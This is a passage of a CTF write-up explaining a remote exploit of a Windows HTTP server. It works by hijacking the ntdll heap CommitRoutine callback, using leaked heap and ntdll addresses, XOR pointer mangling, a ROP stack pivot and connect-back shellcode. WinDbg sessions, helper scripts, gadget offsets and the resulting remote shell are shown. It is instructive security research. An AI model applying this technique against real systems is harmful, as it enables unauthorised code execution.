The CommitRoutine field immediately caught my eye as it sounds like something you can trigger with a large allocation (such as with our Content-Length). The documentation mentions the following:

Callback routine to commit pages from the heap. If this parameter is non-NULL, the heap must be nongrowable. If HeapBase is NULL, CommitRoutine must also be NULL.

However our private heaps are growable since they are created with HeapCreate(0, 0, 0), whose documentation says:

If dwMaximumSize is 0, the heap can grow in size. The heap’s size is limited only by the available memory.

Anyways if we change its value manually in the debugger and trigger a large allocation, it turns out that the callback is indeed called!

0:004> dt nt!_HEAP 1ee`a0a60000 CommitRoutine
ntdll!_HEAP
   +0x168 CommitRoutine : 0x685d9804`f365ca2b     long  +685d9804f365ca2b
0:004> eq 1ee`a0a60000+168 4142434445464748
0:004> g
(25ac.3eac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!guard_dispatch_icall_nop:
00007ff8`92a73030 ffe0            jmp     rax {291fdb40`b6238d63}
0:003> r
rax=291fdb40b6238d63 rbx=000001eea0a60000 rcx=000001eea0a60000
rdx=000000363e8ff980 rsi=000001eea0a64fc0 rdi=000001eea0a64fd0
rip=00007ff892a73030 rsp=000000363e8ff918 rbp=000001eea0a60000
 r8=000000363e8ffa28  r9=0000000000003010 r10=00007ff892af09a0
r11=8080808080808080 r12=0000000000000000 r13=000000000000007f
r14=000000363e8ffa28 r15=000001eea0a602e8
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206

As we can see several registers have values in the heap, with rbx, rcx and rbp pointing to the beginning of the heap. Using this along with our (constrained) arbitrary-write, we should be able to pivot to a ROP/JOP chain.

A quick look inside RtlpFindAndCommitPages (from the Stack Trace) shows a xor rax, cs:RtlpHeapKey before the call to the CFG dispatch function (Control Flow Guard isn’t enabled here).

0:003> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 00000036`3e8ff918 00007ff8`929e8773 : 000001ee`a0a60000 00000000`00000000 00000000`00000020 00007ff8`929e01fe : ntdll!guard_dispatch_icall_nop
01 00000036`3e8ff920 00007ff8`929e8433 : 000001ee`a0a65000 000001ee`a0a60000 00000036`3e8ff9d0 00000000`00000010 : ntdll!RtlpFindAndCommitPages+0x87
02 00000036`3e8ff980 00007ff8`929e07b4 : 00000000`00000040 00000000`00000002 00000000`0000007f 00000000`00004000 : ntdll!RtlpExtendHeap+0x33
03 00000036`3e8ffa10 00007ff8`929dda21 : 000001ee`a0a60000 00000000`00000002 00000000`00003001 00000000`00003010 : ntdll!RtlpAllocateHeap+0xf54
04 00000036`3e8ffc80 00007ff6`58072732 : 00000000`00000000 00000000`00000000 000001ee`a0a60a4f 00007ff6`58070000 : ntdll!RtlpAllocateHeapInternal+0x991
05 00000036`3e8ffd70 00007ff8`8fdb7e94 : 00000000`000000b8 00000000`00000000 00000000`00000000 00000000`00000000 : winhttpd!handle_client+0x292
06 00000036`3e8ffe00 00007ff8`92a3a251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
07 00000036`3e8ffe30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:003> dq ntdll!RtlpHeapKey L1
00007ff8`92b36808  685d9804`f365ca2b

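Since the initial value of CommitRoutine was NULL, the mangled value stored in the heap is the XOR key itself (0 ^ key == key). We can therefore leak the heap XOR key either from the CommitRoutine field of any heap or directly from ntdll!RtlpHeapKey.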
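The mangling can be checked against the debugger session above: XORing the value written with eq against RtlpHeapKey gives exactly the rax value seen at the crash. A short sketch, with function names of my own choosing:

```python
MASK64 = (1 << 64) - 1

def mangle(ptr: int, heap_key: int) -> int:
    """Value to store in _HEAP.CommitRoutine so that ptr ends up being called."""
    return (ptr ^ heap_key) & MASK64

def demangle(stored: int, heap_key: int) -> int:
    """What ntdll computes before the indirect call (XOR is its own inverse)."""
    return (stored ^ heap_key) & MASK64

heap_key = 0x685d9804f365ca2b  # RtlpHeapKey in the session above
stored = 0x4142434445464748    # value written with eq

print(hex(demangle(stored, heap_key)))  # matches rax at the access violation
print(hex(mangle(0, heap_key)))         # a NULL CommitRoutine stores the key itself
```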

Finding the address of any heap

This is all great but we can’t trigger a large allocation from any of the previous threads anymore, so we’ll have to create a new one, wait before sending it the HTTP headers, and leak its address in the meantime.

Fortunately NTDLL also keeps a list of our heaps:

0:006> !address

        BaseAddress      EndAddress+1        RegionSize     Type       State                 Protect             Usage
--------------------------------------------------------------------------------------------------------------------------
[...]
+      17c`cd460000      17c`cd465000        0`00005000 MEM_PRIVATE MEM_COMMIT  PAGE_EXECUTE_READWRITE             Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
       17c`cd465000      17c`cd46f000        0`0000a000 MEM_PRIVATE MEM_RESERVE                                    Heap       [ID: 6; Handle: 0000017ccd460000; Type: Segment]
[...]
+     7ff8`929d0000     7ff8`929d1000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`929d1000     7ff8`92ae8000        0`00117000 MEM_IMAGE   MEM_COMMIT  PAGE_EXECUTE_READ                  Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92ae8000     7ff8`92b2f000        0`00047000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b2f000     7ff8`92b30000        0`00001000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b30000     7ff8`92b32000        0`00002000 MEM_IMAGE   MEM_COMMIT  PAGE_WRITECOPY                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b32000     7ff8`92b3a000        0`00008000 MEM_IMAGE   MEM_COMMIT  PAGE_READWRITE                     Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
      7ff8`92b3a000     7ff8`92bbd000        0`00083000 MEM_IMAGE   MEM_COMMIT  PAGE_READONLY                      Image      [ntdll; "C:\WINDOWS\SYSTEM32\ntdll.dll"]
[...]
0:006> .for (r $t0 = 7ff8`92b2f000; @$t0 < 7ff8`92b3a000; r $t0 = @$t0 + 8) { .if (poi(@$t0) >= 17c`cd460000 & poi(@$t0) < 17c`cd465000) { dps $t0 L1 } }
00007ff8`92b33bb0  0000017c`cd460000
0:006> dq 0x7ff892b33b80
00007ff8`92b33b80  0000017c`cd2c0000 0000017c`cd0b0000
00007ff8`92b33b90  0000017c`cd220000 0000017c`cd4e0000
00007ff8`92b33ba0  0000017c`cd260000 0000017c`cd6d0000
00007ff8`92b33bb0  0000017c`cd460000 0000017c`cd590000
00007ff8`92b33bc0  00000000`00000000 00000000`00000000
00007ff8`92b33bd0  00000000`00000000 00000000`00000000

We can launch a new thread and use the arbitrary read from above to leak its value.
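Assuming the array has been read out of NTDLL (in practice one pointer at a time with the string-based read), spotting the new heap is a matter of comparing the list before and after spawning the thread. The sketch below rebuilds the dq dump above as bytes and parses it; the helper names are mine.

```python
import struct

def parse_heap_list(raw: bytes) -> list:
    """Unpack little-endian qwords until the first NULL entry."""
    heaps = []
    for (ptr,) in struct.iter_unpack("<Q", raw):
        if ptr == 0:
            break
        heaps.append(ptr)
    return heaps

def new_heaps(before: list, after: list) -> list:
    """Heaps present in the second snapshot but not in the first."""
    return [h for h in after if h not in before]

# Content of the dq dump above, rebuilt as raw bytes for the example.
dump = struct.pack(
    "<12Q",
    0x17ccd2c0000, 0x17ccd0b0000, 0x17ccd220000, 0x17ccd4e0000,
    0x17ccd260000, 0x17ccd6d0000, 0x17ccd460000, 0x17ccd590000,
    0, 0, 0, 0,
)
heaps = parse_heap_list(dump)
print([hex(h) for h in heaps])
print([hex(h) for h in new_heaps(heaps[:6], heaps)])
```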

Stack pivot, ROP, shellcode

We control RIP and rbp points to the heap, so we can look for a “leave ; pop ; ret” pivot gadget. This one does the trick:

# leave ; ⇨ mov rsp, rbp ; pop rbp
# mov rbx, qword [rsp+0x18]
# mov rax, rcx
# mov rbp, qword [rsp+0x20]
# mov rsi, qword [rsp+0x28]
# mov rdi, qword [rsp+0x30]
# pop r15
# pop r14
# ret
pivot_gadget = ntdll_base + 0x010442e

The above gadget pivots to the beginning of the heap (rbp) and pops 3 values off the pivoted stack, therefore we must control heap+0x18, which is SegmentListEntry, a heap entry without NULL bytes in its LSBs – so we can edit it.
So, we overwrite:

  • heap+0x168 (CommitRoutine) with pivot_gadget ^ RtlpHeapKey
  • heap+0x18 (SegmentListEntry) with a large “add rsp, 0xXXX” gadget:
    • 0x0d26c4: add rsp, 0x0000000000000CD0 # pop rbx # ret
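Put together, the two overwrites can be computed as follows. The gadget offsets, NTDLL base and heap key are the ones quoted in this write-up and are only valid for this exact ntdll build and run; the dictionary layout is just a convenient way to present them.

```python
import struct

ntdll_base = 0x7ff8929d0000    # from the exploit output (this run)
heap_key = 0xf603ad6b90e97029  # ntdll!RtlpHeapKey (this run)

PIVOT_GADGET_OFF = 0x10442e    # leave ; ... ; pop r15 ; pop r14 ; ret
ADD_RSP_GADGET_OFF = 0x0d26c4  # add rsp, 0xCD0 ; pop rbx ; ret

pivot_gadget = ntdll_base + PIVOT_GADGET_OFF
add_rsp_gadget = ntdll_base + ADD_RSP_GADGET_OFF

# offset inside the target heap -> qword to write there
writes = {
    0x168: pivot_gadget ^ heap_key,  # CommitRoutine is stored mangled
    0x018: add_rsp_gadget,           # first return address after the pivot
}

for offset, value in sorted(writes.items()):
    print(f"heap+{offset:#05x} <- {struct.pack('<Q', value).hex()}")
```

After leave sets rsp to the heap base, the three pops consume heap+0x00, heap+0x08 and heap+0x10, so the final ret fetches its target from heap+0x18.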

Now we can store a retsled followed by a ROP chain. Since I didn’t bother to leak any other libs from NTDLL, I decided to ROP directly to ntdll!NtProtectVirtualMemory, the syscall used behind the scenes by VirtualProtect – which allows us to change the heap page permissions to RWX.

At this point we just need to store a connect-back shellcode after the ROP and jump into it to finally get our shell and read the flag!

$ ./sploit.py 172.16.62.153 42003
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19224
[+] Opening connection to 172.16.62.153 on port 42003: Done
[*] heap leak: 0x17ccd223160
[+] heap of thread 1 @ 0x17ccd220000
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19225
[+] Opening connection to 172.16.62.153 on port 42003: Done
[*]   'username' in heap 1 @ 0x17ccd222c80
[*]   ntdll pointer @ 0x17ccd2202c0
[*]   'password' in heap 1 @ 0x17ccd222ca0
[*]   CommitRoutine in heap 1 @ 0x17ccd220168
[+] ntdll!RtlpStaticDebugInfo leak: 0x7ff892b33d10
[+] NTDLL @ 0x7ff8929d0000
[+] ntdll!RtlpHeapKey = 0xf603ad6b90e97029
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19226
[+] Opening connection to 172.16.62.153 on port 42003: Done
[+] Opening connection to 172.16.62.153 on port 42003: Done
[*]   thread 4 addr stored in ntdll @ 0x7ff892b33bb0
check threads list
[+] target_heap @ 0x17ccd460000
[+] Trying to bind to 0.0.0.0 on port 12345: Done
[+] Waiting for connections on 0.0.0.0:12345: Got connection from 172.16.62.153 on port 19227
[+] Opening connection to 172.16.62.153 on port 42003: Done
[+] Spawning shell...

And get the connect-back (here from the CTF server):

$ nc -lvp 1337
listening on [any] 1337 ...
connect to [212.83.129.72] from 95.230.242.35.bc.googleusercontent.com [35.242.230.95] 49729
Microsoft Windows [Version 10.0.17763.253]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\winhttpd\inetpub>cd ..
C:\winhttpd>dir
 Volume in drive C has no label.
 Volume Serial Number is F845-3464

 Directory of C:\winhttpd

01/19/2019 01:07 AM <DIR> .
01/19/2019 01:07 AM <DIR> ..
01/19/2019 12:52 AM <DIR> inetpub
01/19/2019 01:06 AM 26,112 winhttpd.exe
01/18/2019 11:01 PM <DIR> wow_gg_the_flag_is_in_here
              1 File(s) 26,112 bytes
              4 Dir(s) 40,418,689,024 bytes free

C:\winhttpd>cd wow_gg_the_flag_is_in_here
C:\winhttpd\wow_gg_the_flag_is_in_here>type flag.txt
INS{HEADs I WIN, tails you lose}

In summary, we used 5 requests/threads, all of which we kept alive throughout the exploit:

  • 1st one leaked the address of the first private heap
  • 2nd leaked NTDLL + the RtlpHeapKey value
  • 3rd leaked the address of the target heap
  • 4th has the target heap, we keep it waiting for a while then trigger a large allocation to get RIP
  • 5th uses the arbitrary write to overwrite the mangled CommitRoutine pointer with a stack pivot

Conclusions

Of course none of this is really specific to “private” heaps. You can find the same ntdll!RtlpStaticDebugInfo pointer and CommitRoutine callback in the main heap as well 🙂

Unfortunately no team was able to solve the challenge during the CTF, although it appears that several teams were pretty close!
You can find my exploit here and the sources here. It can fail sometimes because of things like occasional NULL bytes in the leaked values, but should work most of the time.